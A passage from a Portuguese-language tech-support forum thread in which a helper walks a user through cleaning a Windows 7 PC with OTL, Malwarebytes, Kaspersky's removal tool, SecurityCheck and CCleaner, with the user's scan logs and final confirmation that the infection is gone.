[2013/12/05 01:14:53 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\IEAdvpack.dll

[2013/12/05 01:14:53 | 000,108,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe

[2013/12/05 01:14:53 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/12/05 01:14:53 | 000,083,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inseng.dll

[2013/12/05 01:14:53 | 000,074,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SetIEInstalledDate.exe

[2013/12/05 01:14:53 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/12/05 01:14:53 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll

[2013/12/05 01:14:53 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/12/05 01:14:53 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\pngfilt.dll

[2013/12/05 01:14:53 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll

[2013/12/05 01:14:53 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmler.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeedsbs.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/12/05 01:14:53 | 000,036,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\imgutil.dll

[2013/12/05 01:14:53 | 000,034,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll

[2013/12/05 01:14:53 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/12/05 01:14:53 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\licmgr10.dll

[2013/12/05 01:14:53 | 000,012,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeedssync.exe

[2013/12/05 01:14:53 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll

[2013/12/04 20:43:51 | 000,000,000 | ---D | C] -- C:\_OTL

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/12 23:25:21 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\authui.dll

[2013/11/12 23:25:21 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SmartcardCredentialProvider.dll

[2013/11/12 23:25:15 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ncrypt.dll

[2013/11/12 23:25:14 | 000,015,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\sspisrv.dll

[2013/11/12 23:25:10 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL

[2013/11/12 23:25:09 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\nshwfp.dll

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/12/08 12:22:59 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/12/08 12:22:49 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/12/08 12:22:45 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/12/08 12:05:00 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/12/08 11:55:00 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/12/07 22:55:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/12/07 17:02:22 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/12/07 17:02:22 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/12/05 18:17:13 | 000,178,597 | ---- | M] (Igor Pavlov) -- C:\Users\2011\Desktop\bankerfix.exe

[2013/12/05 01:14:53 | 004,240,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/12/05 01:14:53 | 002,724,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/12/05 01:14:53 | 001,926,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl

[2013/12/05 01:14:53 | 001,051,136 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll

[2013/12/05 01:14:53 | 000,703,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll

[2013/12/05 01:14:53 | 000,646,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe

[2013/12/05 01:14:53 | 000,645,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jsIntl.dll

[2013/12/05 01:14:53 | 000,616,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dat

[2013/12/05 01:14:53 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll

[2013/12/05 01:14:53 | 000,523,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/12/05 01:14:53 | 000,440,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/12/05 01:14:53 | 000,367,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll

[2013/12/05 01:14:53 | 000,337,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\html.iec

[2013/12/05 01:14:53 | 000,244,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll

[2013/12/05 01:14:53 | 000,238,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll

[2013/12/05 01:14:53 | 000,233,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\url.dll

[2013/12/05 01:14:53 | 000,208,896 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/12/05 01:14:53 | 000,194,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\elshyph.dll

[2013/12/05 01:14:53 | 000,182,272 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msls31.dll

[2013/12/05 01:14:53 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll

[2013/12/05 01:14:53 | 000,151,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iexpress.exe

[2013/12/05 01:14:53 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wextract.exe

[2013/12/05 01:14:53 | 000,116,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iepeers.dll

[2013/12/05 01:14:53 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe

[2013/12/05 01:14:53 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\IEAdvpack.dll

[2013/12/05 01:14:53 | 000,108,032 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe

[2013/12/05 01:14:53 | 000,086,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/12/05 01:14:53 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\inseng.dll

[2013/12/05 01:14:53 | 000,074,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SetIEInstalledDate.exe

[2013/12/05 01:14:53 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/12/05 01:14:53 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll

[2013/12/05 01:14:53 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/12/05 01:14:53 | 000,056,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\pngfilt.dll

[2013/12/05 01:14:53 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll

[2013/12/05 01:14:53 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtmler.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeedsbs.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/12/05 01:14:53 | 000,036,352 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\imgutil.dll

[2013/12/05 01:14:53 | 000,034,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll

[2013/12/05 01:14:53 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/12/05 01:14:53 | 000,024,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\licmgr10.dll

[2013/12/05 01:14:53 | 000,016,284 | ---- | M] () -- C:\Windows\System32\ieuinit.inf

[2013/12/05 01:14:53 | 000,012,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeedssync.exe

[2013/12/05 01:14:53 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll

[2013/11/30 13:50:57 | 000,139,264 | ---- | M] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/12/05 01:14:53 | 000,016,284 | ---- | C] () -- C:\Windows\System32\ieuinit.inf

[2013/11/30 13:50:46 | 000,139,264 | ---- | C] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

< End of report >

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

Reinstale o Firefox e o Chrome ;)

Em seguida faça,

Faça o download do Malwarebytes Anti-Malware:

  • Link1
  • Link alternativo
    • Clique duas vezes em mbam-setup.exe, escolha a linguagem e siga as instruções para o software ser instalado.
    • Certifique-se que esteja marcada a caixa Atualizar Malwarebytes Anti-Malware e Executar Malwarebytes Anti-Malware, e clique em concluir.
    • Se existirem atualizações, elas serão baixadas e instaladas.
    • Quando as atualizações terminarem, abrirá uma janela do programa. Marque "Verificação Rápida", e depois clique no botão Verificar.
    • O scan iniciará e poderá ser demorado. Por favor seja paciente.
    • Quando o scan estiver completo, clique em Ok, depois em Mostrar Resultados para ver o log.
    • Se algo for encontrado, certifique-se que tudo está marcado e clique em Remover.
    • Quando a desinfecção terminar, automaticamente um log surgirá aberto num documento do Bloco de Notas e pode ser questionado para reiniciar o PC. (Leia a nota)
    • O log é automaticamente guardado e pode ser consultado clicando na tab Logs do menu principal.
    • Copie e cole o conteúdo desse log na sua próxima resposta.

Nota: Em infecções mais complicadas, poderá haver a necessidade de reiniciar o PC. Caso lhe seja pedido para reiniciar, por favor, faça-o imediatamente.

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde Diego!

Desculpe a demora.

Reinstalei chrome e apenas desinstalei o Firefox (não o utilizava).

Segue abaixo o log do Malwarebytes.

Abraço!

----------------------------------

Malwarebytes Anti-Malware 1.75.0.1300

www.malwarebytes.org

Versão da Base de Dados: v2013.12.15.03

Windows 7 Service Pack 1 x86 NTFS

Internet Explorer 11.0.9600.16476

2011 :: 2011_PC [administrador]

15/12/2013 12:51:31

mbam-log-2013-12-15 (12-51-31).txt

Tipo de Verificação: Verificação Rápida

Opções de verificações ativadas: Memória | Inicialização | Registro | Sistema de arquivos | Heurística/Extra | Heurística/Shuriken | PUP | PUM

Opções de verificação desativadas: P2P

Objetos escaneados: 194298

Tempo decorrido: 5 minuto(s), 53 segundo(s)

Processos de Memória Detectados: 0

(Não foram detectados ítens maliciosos)

Módulos de Memória Detectados: 0

(Não foram detectados ítens maliciosos)

Chaves de Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Valores de Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Itens de Dados no Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Pastas Detectadas: 0

(Não foram detectados ítens maliciosos)

Arquivos Detectados: 2

C:\Users\2011\Programas\DTLite4454-0316.exe (PUP.Optional.OpenCandy) -> Enviado para a Quarentena e deletado com sucesso.

C:\Windows\KMService.exe (RiskWare.Tool.CK) -> Enviado para a Quarentena e deletado com sucesso.

(fim)

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

# Etapa nº 1 #

Faça o download do Kaspersky AVP Tool de um desses links:

Alternativa 1

Alternativa 2

  • Você será direcionado a uma página da Kaspersky, solicitando um email para cadastro, nome e sobrenome.
  • Somente o campo "email" é obrigatório.
  • Informe seu email depois clique no botão Submit Form.
  • A página será recarregada. Clique no botão Download
  • Salve-o em sua área de trabalho (Desktop).
  • Execute o arquivo e aguarde a instalação.
    • ** Usuários do Windows Vista e Windows 7: Clique com o direito sobre o arquivo, depois clique em Executar como administrador

  • Na tela do contrato de licença, marque a opção I accept the license agreement e depois clique no botão Start.
  • Aparentemente o programa congela e nada acontece. É normal, apenas aguarde até aparecer a tela inicial do programa, e então clique no ícone Settings:

KRT_settings.png

Nesta tela, marque a caixa ao lado de:

  • Meu Computador;
  • Disco local (C:);
  • Marque também todas as unidades que aparecem abaixo de Disco Local, caso houverem;
  • Depois clique na aba Automatic Scan.

KRT_install2_.png

  • De volta à tela inicial do programa, clique no botão Start scanning;
  • Tenha paciência, é um pouco demorado;
  • Quando terminar, caso tenha detectado algo, o programa irá lhe perguntar o que fazer;
  • Marque o quadradinho ao lado de Apply to all objects e depois clique em Skip (queremos apenas o log).

KRT_detection_.png

Uma vez finalizado o scan, proceda da seguinte forma:

  1. Na tela principal, caso tenha sido detectado algo, então salve o log.
  2. Se você fechar o programa e esquecer de salvar o log, terá que repetir todo o scan novamente.
  3. Para salvar o log, clique no ícone Reports (ao lado do ícone "Settings").
  4. Na próxima janela, clique em Detected Threats, depois clique no ícone de disquete para salvar o log.
  5. Escolha um local de fácil acesso e salve como log.txt
  6. Copie todo o conteúdo desse bloco de notas e cole em sua próxima resposta.
  7. Se nada for detectado, então não precisa salvar o log, apenas avise.
  8. Para sair do programa, basta clicar no X no canto superior direito.

Observações:
Enquanto durar o scan, a tela inicial exibirá uma barra de progresso. Quando terminar, o programa exibirá o status concluído e um botão que ficará na cor
laranja
, caso nada tenha sido detectado; e na cor
vermelha
, caso tenha encontrado algo. Caso tenha detectado algo, o programa também exibirá uma tela de alerta, avisando que o seu sistema está desprotegido e sugerindo um produto da Kaspersky. Clique no botão
No, thanks
.

# Etapa nº 2 #

Faça o download do SecurityCheck e salve em seu Desktop

  • Clique duas vezes no SecurityCheck.exe
    • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

  • Pressione qualquer tecla para continuar... será aberto um relatório
  • Copie todo seu conteúdo e cole em sua próxima resposta

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Diego.

Seguem os logs solicitados; 1º do Kaspersky, e o 2º do Security Check.

Obrigado!!!

=-------------

Status: Detected (events: 6)

16/12/2013 09:38:35 Detected Trojan program Trojan.Win32.Staser.fv C:\AdwCleaner\Quarantine\C\ProgramData\eSafe\eGdpSvc.exe.vir High

16/12/2013 10:00:44 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Documents and Settings\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//data0002.res Medium

16/12/2013 10:14:10 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Users\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//data0002.res Medium

16/12/2013 10:19:40 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Users\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//# Medium

16/12/2013 10:19:40 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Documents and Settings\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//# Medium

16/12/2013 11:49:54 Detected Trojan program HEUR:Trojan.Script.Generic C:\_OTL\MovedFiles\12042013_204351\C_ProgramData\ppctrl.dat High

-----------------

Results of screen317's Security Check version 0.99.77

Windows 7 Service Pack 1 x86 (UAC is enabled)

Internet Explorer 11

``````````````Antivirus/Firewall Check:``````````````

avast! Antivirus

Antivirus up to date!

`````````Anti-malware/Other Utilities Check:`````````

CCleaner

JavaFX 2.1.1

Java 6 Update 30

Java 7 Update 45

Adobe Flash Player 11.9.900.117

Google Chrome 31.0.1650.63

````````Process Check: objlist.exe by Laurent````````

AVAST Software Avast AvastSvc.exe

AVAST Software Avast AvastUI.exe

`````````````````System Health check`````````````````

Total Fragmentation on Drive C:

````````````````````End of Log``````````````````````

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

# Etapa nº 1 #

Novamente com o OTL

  • Clique duas vezes no ícone 3984478580_7ed4cabc45_o.gif
  • Clique no botão 5370056514_5fd20b1e73_m.jpg
  • Aguarde...
  • Quando for pedido para reiniciar clique em OK.

# Etapa nº 2 #

<<@>> Instale o CCleaner

O CCleaner é um excelente utilitário de limpeza para o computador, que lhe ajudará no desempenho do computador. Faça o download dele aqui CCleaner


  • IMPORTANTE: Após a instalação vá até o local onde o programa foi instalado, C:\Arquivos de programas\CCleaner, clique duas vezes na pasta, numa área vazia desta janela, clique com o botão direito do mouse e escolha Novo > pasta e crie uma nova pasta; coloque o nome de backups!
  • Abra o programa e clique em Executar Limpeza;
  • clique no botão Registro > Procurar Erros > Corrigir erro(s) seleciona(s)...
    Obs: Não se esqueça de aceitar o backup das correções, e salvá-los nas pasta criada acima!

<<@>> Mantenha sempre seu Windows atualizado; mantenha uma vigilância constante com o firewall e antivírus e por fim, lembre-se que, a melhor forma de prevenir começa pelas nossas atitudes!

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Diego, eu estava viajando e não pude responder antes.

Fiz todos os procedimentos e o pc está livre daquele vírus. Obrigado!!

Manoel.

Compartilhar este post


Link para o post
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×